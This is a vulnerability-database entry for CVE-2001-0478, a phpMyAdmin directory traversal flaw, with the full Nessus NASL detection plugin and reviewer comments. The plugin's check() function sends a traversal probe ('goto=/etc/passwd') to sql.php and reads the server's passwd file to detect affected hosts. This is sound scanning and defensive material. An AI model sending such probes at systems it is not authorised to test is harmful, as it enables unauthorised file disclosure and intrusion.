Vulnerabilities > CVE-2001-0478 - Unspecified vulnerability in PHPmyadmin

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
phpmyadmin
nessus

Summary

Directory traversal vulnerability in phpMyAdmin 2.2.0 and earlier versions allows remote attackers to execute arbitrary code via a .. (dot dot) in an argument to the sql.php script.

Nessus

NASL family: CGI abuses
NASL id: PHPMYADMIN_FILE_READING.NASL
description: It is possible to make the remote phpMyAdmin installation read arbitrary data on the remote host. An attacker may use this flaw to read arbitrary files that your web server has the right to access or execute arbitrary PHP code.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11116
published: 2002-09-04
reporter: This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11116
title: phpMyAdmin sql.php Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

#
# Ref: http://www.securereality.com.au/archives/sradv00008.txt
#


include("compat.inc");

# Registration block: runs only when `description` is set, records the
# plugin's metadata and scheduling requirements, then exits via exit(0)
# before any of the request code further down is reached.
if (description)
{
 script_id(11116);
 script_version ("1.27");
 script_cvs_date("Date: 2018/07/24 18:56:10");

 # Advisory identifiers this check is mapped to.
 script_cve_id("CVE-2001-0478");
 script_bugtraq_id(2642);

 script_name(english:"phpMyAdmin sql.php Traversal Arbitrary File Access");
 # NOTE(review): the summary says "presence of sql.php", but the code below
 # does more than a presence check -- it requests sql.php / sql.php3 with a
 # goto= parameter and inspects the response body.
 script_summary(english:"Checks for the presence of sql.php");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file inclusion flaw." );
 script_set_attribute(attribute:"description", value:
"It is possible to make the remote phpMyAdmin installation read
arbitrary data on the remote host.  An attacker may use this flaw to
read arbitrary files that your web server has the right to access or
execute arbitrary PHP code." );
 # https://web.archive.org/web/20020713150446/http://archives.neohapsis.com/archives/bugtraq/2001-04/0396.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?769b91eb" );
 # Remediation reported to the operator: upgrade past the affected release.
 script_set_attribute(attribute:"solution", value:
"Upgrade to phpMyAdmin 2.2.1 or newer" );
 # NOTE(review): this base vector declares AC:H (high access complexity),
 # while the CVE listing published alongside this plugin rates the attack
 # complexity LOW with a 7.5 score -- confirm which rating should drive
 # prioritisation before relying on the plugin's severity.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/09/04");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/07/02");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
 script_end_attributes();

 # ACT_ATTACK: the plugin sends an active probe to the target rather than
 # only reading banners, so scan policies that exclude active checks skip it.
 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 # Depends on the detection plugin; presumably that is what populates the
 # "www/<port>/phpMyAdmin" KB entry read later in this script -- confirm.
 script_dependencie("phpMyAdmin_detect.nasl");
 # Not scheduled when the "Settings/disable_cgi_scanning" KB key is present.
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 # Only scheduled when both phpMyAdmin and PHP KB keys exist for the host.
 script_require_keys("www/phpMyAdmin", "www/PHP");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Web port under test, defaulting to 80. `port` is a script-level variable
# that check() below reads directly instead of taking it as a parameter.
# NOTE(review): php:TRUE presumably limits the choice to servers known to
# run PHP -- confirm against http.inc.
port = get_http_port(default:80, php:TRUE);


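#
# check(dir, file)
#
# Sends the plugin's single GET probe to <dir>/<file> on the script-level
# `port` and reports the host as affected when the response body contains a
# passwd-style root entry.
#
#   dir  - directory of the phpMyAdmin install (taken from the KB by the caller)
#   file - script name to request ("sql.php" or "sql.php3" in this plugin)
#
# Returns nothing. On a positive match it calls security_warning(port) and
# exits the plugin, so later calls are skipped once one probe succeeds.
# The request is made with exit_on_fail:TRUE, so a failed request is left to
# http_send_recv3 to handle rather than being checked here.
#
function check(dir, file)
{
 local_var r, url;

 # The probe URL is unchanged from the original plugin.
 url = string(dir, "/", file, "?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd");
 r = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

 # r[2] is the response body. The previous pattern,
 # ".*root:.*:.*:0:[01]:.*", demanded one extra colon-delimited field between
 # "root:" and the ":0:<gid>:" pair, so a conventional seven-field entry
 # (name:password:uid:gid:...) could never match and affected hosts were
 # silently reported clean. Matching "root:<field>:0:<0|1>:" accepts that
 # layout as well as the longer one the old pattern accepted. The leading and
 # trailing ".*" were redundant for an unanchored egrep and are dropped.
 if (egrep(pattern:"root:.*:0:[01]:", string:r[2]))
 {
  security_warning(port);
  exit(0);
 }
}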


# Look up the phpMyAdmin install recorded in the KB for this port; with no
# entry there is nothing to test.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);

# The KB value is expected to look like "<something> under <dir>"; only the
# directory (second capture group) is used.
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (isnull(matches)) exit(0);

dir = matches[2];

# Try both script names, in the same order as before. check() exits the
# plugin on the first positive result.
foreach page (make_list("sql.php", "sql.php3"))
  check(dir:dir, file:page);